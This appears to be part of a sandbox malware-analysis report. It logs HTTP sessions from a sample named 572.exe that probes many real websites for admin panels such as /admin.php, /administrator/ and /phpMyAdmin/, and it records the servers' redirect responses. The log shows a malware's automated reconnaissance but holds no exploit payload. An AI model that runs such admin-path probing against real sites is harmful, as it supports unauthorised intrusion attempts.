Location: https://accounts.faceit.com/phpmyadmin/
Set-Cookie: __cf_bm=XADvHeTblGnYAGH5fIY149VZt8m2ojLLVvWNRWV5PEY-1707131691-1-AW4ra6nKl8YPs+tgZqSbCuwal1thAH42pB7/z0iOdlBXcgmv/52/fUknG1tJYcZ0O07uxq3B3nrVo0V7crTY+5/Fy5nkTq5CSbKEBxnhxtYb; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.faceit.com; HttpOnly; SameSite=None
Vary: Accept-Encoding
Set-Cookie: _cfuvid=AYLGosTwxbApeH3ZOQC199phYszxhU1LIj5LcmeqBdU-1707131691323-0-604800000; path=/; domain=.faceit.com; HttpOnly
Server: cloudflare
CF-RAY: 850abb6ead9ab175-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
187 | 192.168.2.6 | 55671 | 104.26.8.17 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.281136036 CET | 168 | OUT | GET /phpMyAdmin/ HTTP/1.1
Host: rage.mp
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.410614014 CET | 679 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
Location: https://rage.mp/phpMyAdmin/
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P23TM8PM60mHXLkCLfKRJ7c0Zr8KMd3RHlIrxfnxdnz99p2drQClGn9HqBZNdmpQqgWZDIrHU4854nGcY1WzxzTjAu9qStt6sLzETeQ3GhfTSYG4YWr2xjA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 850abb6edb0253f6-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                188192.168.2.65564131.13.65.780524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.294739008 CET183OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.396543980 CET217INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://lookaside.fbsbx.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.710078001 CET217INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://lookaside.fbsbx.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
Feb 5, 2024 12:15:00.909635067 CET | 192 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: lookaside.fbsbx.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:01.011698008 CET | 226 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://lookaside.fbsbx.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
189 | 192.168.2.6 | 55643 | 184.25.164.103 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.294740915 CET | 186 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.470642090 CET | 351 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>
Feb 5, 2024 12:15:00.090513945 CET | 195 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: store.steampowered.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:00.268906116 CET | 360 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 138
                                                                                                                                                                                                                                                                                                                                                                Location: https://store.steampowered.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:15:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
190 | 192.168.2.6 | 55644 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.295103073 CET | 178 | OUT | GET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.419626951 CET | 483 | IN | HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.google.com/admin.php
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'self'
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 182
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
Feb 5, 2024 12:14:51.419642925 CET | 182 | IN | gzip-compressed response body


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
191 | 192.168.2.6 | 55649 | 31.13.88.1 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.297002077 CET | 182 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.398838043 CET | 216 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.707858086 CET216INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/administrator/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.366786003 CET191OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: th-th.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:06.468625069 CET220INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://th-th.facebook.com/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
192 | 192.168.2.6 | 55706 | 172.67.148.124 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.300585985 CET | 168 | OUT | GET /admin.php HTTP/1.1
Host: loopex.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.426367044 CET | 658 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 05 Feb 2024 11:14:51 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Mon, 05 Feb 2024 12:14:51 GMT
Location: https://loopex.io/admin.php
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0G%2FnINbR5OgAuL9jZ%2FU6T432yfhjaGC0S%2F8lITvDOgS9FPe4WDF9RqtlshEUCRusoNLjpiphZRC76qfivJ1knTqA84pTTre39nWoP1Y2oPm%2BYBYPYQujPn23iT8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 850abb6efd52b0ee-ATL
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
193 | 192.168.2.6 | 55705 | 8.45.52.148 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.302058935 CET | 177 | OUT | GET /admin.php HTTP/1.1
Host: genshin.mihoyo.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.453375101 CET | 613 | IN | HTTP/1.1 301 Moved Permanently
Server: Tuser
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 262
Connection: keep-alive
Location: https://genshin.mihoyo.com/admin.php
Cache-Control: no-cache
Access-Control-Allow-Origin: *
Via: ens-cache10.us19[,0]
Timing-Allow-Origin: *
EagleId: 082d349e17071316914171209e
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>301 Moved Permanently</h1><p>The requested resource has been assigned a new permanent URI.</p><hr/>Powered by Tuser</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
194 | 192.168.2.6 | 55739 | 184.25.164.103 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.302063942 CET | 181 | OUT | GET /admin.php HTTP/1.1
Host: store.steampowered.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.478328943 CET | 346 | IN | HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html
Content-Length: 138
Location: https://store.steampowered.com/admin.php
Date: Mon, 05 Feb 2024 11:14:51 GMT
Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
195 | 192.168.2.6 | 55740 | 142.250.105.84 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.302063942 CET | 174 | OUT | GET /admin HTTP/1.1
Host: accounts.google.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.429114103 CET | 479 | IN | HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 05 Feb 2024 11:14:51 GMT
Location: https://accounts.google.com/admin
Content-Encoding: gzip
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'self'
X-XSS-Protection: 1; mode=block
Content-Length: 179
Server: GSE
Feb 5, 2024 12:14:51.429150105 CET | 179 | IN | [gzip-compressed response body; raw bytes omitted]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
196 | 192.168.2.6 | 55753 | 3.163.115.86 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.310602903 CET | 172 | OUT | GET /admin HTTP/1.1
Host: connect.appen.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.412163973 CET | 572 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://connect.appen.com/admin
X-Cache: Redirect from cloudfront
Via: 1.1 392ae56b81ecdd89977a6262a9d12eb2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL58-P9
X-Amz-Cf-Id: xw-4FBe98BkkUUA-3werhjEB84VkVz9ulBHde-I8ebMTCobNoDB14w==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>
Feb 5, 2024 12:14:51.722742081 CET | 572 | IN | HTTP/1.1 301 Moved Permanently
Server: CloudFront
Date: Mon, 05 Feb 2024 11:14:51 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Location: https://connect.appen.com/admin
X-Cache: Redirect from cloudfront
Via: 1.1 392ae56b81ecdd89977a6262a9d12eb2.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: ATL58-P9
X-Amz-Cf-Id: xw-4FBe98BkkUUA-3werhjEB84VkVz9ulBHde-I8ebMTCobNoDB14w==
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                197192.168.2.655707200.108.110.16480524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.329525948 CET187OUTGET /admin.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: midetuvelocidad.claro.com.pe
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:51.514595985 CET417INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=45
                                                                                                                                                                                                                                                                                                                                                                Location: https://midetuvelocidad.claro.com.pe/admin.php?
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
198 | 192.168.2.6 | 55395 | 172.66.40.88 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.347698927 CET | 179 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.645008087 CET | 1145 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://warriorplus.com:443/administrator/
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=X8%2B2JnmctytTad%2BDX5gVIRkMW3kuW4lO6oS%2BgHg2yVdlRSDcshRqbI1lZjYnDkQxvr28h6CS%2BBl84CeB52B7GcwQ1pd8m%2BRoVNdgiocqcvgIVpSWYX2dD92l3yKIa16EcQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb6f3afb6787-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abb6f3afb6787","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
Feb 5, 2024 12:14:51.645024061 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0
Feb 5, 2024 12:16:06.325644016 CET | 188 | OUT | GET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: warriorplus.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:16:06.619038105 CET | 1158 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://warriorplus.com:443/administrator/index.php
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S%2BKchonp0d0zFr0eAa8WOpuU%2FxQqPJz8O1sxVUQFT0sRNOBfgQFsLnjCmrIGN%2Fm0bTNY%2FVJalm3w1oXz0JEZ1CjjFSFa0gWFcBn6qt712VmIc%2Bq%2FSLqrohz%2BaoAuebm0Aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd43de956787-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f3<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><script defer src="https://static.cloudflareinsights.com/beacon.min.js/v84a3a4012de94ce1a686ba8c167c359c1696973893317" integrity="sha512-euoFGowhlaLqXsPWQ48qSkBSCFs3DPRyiwVu3FjR96cMPx+Fr+gpWRhIafcHwqwCqWS42RZhIudOvEI+Ckf6MA==" data-cf-beacon='{"rayId":"850abd43de956787","version":"2024.2.0","token":"59159b5f6bcc48d1b4295b4ba4ed3b0c"}' crossorigin="anonymous"></script></body></html>
Feb 5, 2024 12:16:06.619086027 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
199 | 192.168.2.6 | 55396 | 195.85.23.95 | 80 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
Feb 5, 2024 12:14:51.347703934 CET | 180 | OUT | GET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ro.bongacams.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:14:51.666256905 CET | 751 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
Content-Length: 162
Connection: keep-alive
location: https://ro.bongacams.com/administrator
x-bc: ded6949
x-zone: 3-web22
CF-Cache-Status: DYNAMIC
Set-Cookie: __cf_bm=RK8vmG9lETn.Xnl7j2tT0ZGWpUSne35Shd6noBC8654-1707131691-1-AeNFRU+pi2Eke44tUtCYz8WlBvPkupl2+xSbR3tPLQOUhxxFZQgtdqhbMCAjUNMNqMxWwmaM/ks2JGJg65bPVb8=; path=/; expires=Mon, 05-Feb-24 11:44:51 GMT; domain=.bongacams.com; HttpOnly; SameSite=None
Server: cloudflare
CF-RAY: 850abb6f3b236735-ATL
alt-svc: h3=":443"; ma=86400
Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
Feb 5, 2024 12:15:00.918814898 CET  352  OUT  GET /administrator/index.php HTTP/1.1
Host: ro.bongacams.com
Accept: */*
Accept-Encoding: deflate, gzip
Cookie: __cf_bm=RK8vmG9lETn.Xnl7j2tT0ZGWpUSne35Shd6noBC8654-1707131691-1-AeNFRU+pi2Eke44tUtCYz8WlBvPkupl2+xSbR3tPLQOUhxxFZQgtdqhbMCAjUNMNqMxWwmaM/ks2JGJg65bPVb8=
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 5, 2024 12:15:01.143982887 CET  416  IN  HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:15:01 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
x-zone: 3-ded6941-web19
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 850abbab1dcd6735-ATL
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
Feb 5, 2024 12:15:01.144007921 CET  5  IN  Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
200         192.168.2.6  55404        192.185.5.23    80                524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp  Bytes transferred  Direction  Data
